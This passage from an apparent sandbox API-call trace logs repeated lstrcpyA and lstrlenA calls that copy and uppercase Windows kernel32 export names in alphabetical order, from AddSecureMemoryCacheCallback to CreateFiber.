lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.991] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.991] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.991] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.991] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.991] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.991] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.991] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.991] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.991] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.991] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.992] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.992] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.992] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.992] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.992] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.992] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.992] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.992] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.992] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.992] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.992] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.992] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.992] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.992] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.992] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.992] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.992] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.992] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.992] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.993] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.993] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.993] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.993] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.993] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.993] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.993] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.993] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.993] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.993] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.993] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.993] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.993] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.993] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.993] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.993] lstrlenA (lpString="BEEP") returned 4 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.993] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.993] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.993] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.993] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.994] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.994] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.994] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.994] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.994] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.994] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.994] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.994] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.994] lstrlenA (lpString="CANCELIO") returned 8 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.994] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.994] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.994] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.994] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.994] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.994] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.994] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.994] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.994] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.994] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.994] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.995] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.995] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.995] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.995] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.995] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.995] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.995] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.995] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.995] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.995] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.995] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.995] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.995] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.995] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.995] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.995] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.995] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.995] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.995] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.995] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.996] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.996] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.996] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.996] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.996] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.996] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.996] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.996] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.996] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.996] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.996] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.996] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.996] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.996] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.996] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.996] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.996] lstrlenA (lpString="COPYFILEA") returned 9 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.996] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.996] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.996] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.997] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.997] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.997] lstrlenA (lpString="COPYFILEW") returned 9 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.997] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.997] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.997] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.997] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.997] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.997] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.997] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.997] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.997] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.997] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.997] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.997] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.997] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.997] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.997] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.997] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.998] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.998] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.998] lstrlenA (lpString="CREATEFIBER") returned 11 